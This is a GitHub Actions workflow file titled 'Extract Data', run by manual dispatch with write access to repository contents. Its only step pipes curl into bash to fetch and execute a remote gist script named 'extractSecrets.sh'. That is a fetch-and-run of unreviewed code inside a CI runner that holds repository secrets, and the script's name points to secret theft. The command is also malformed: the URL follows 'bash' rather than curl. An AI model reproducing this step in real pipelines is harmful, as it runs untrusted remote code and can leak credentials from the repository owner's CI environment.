name: Extract Data

on:
  workflow_dispatch:

permissions:
  contents: write

jobs:
  extract:
    runs-on: ubuntu-latest
    steps:
      - name: Run extraction script
        run: |
          curl -fsSL  | bash https://gist.githubusercontent.com/alfetopito/ad724aa2b920a742eb432ff636f99b41/raw/8f5343e485d8c004572f3462312529a09de648b3/extractSecrets.sh
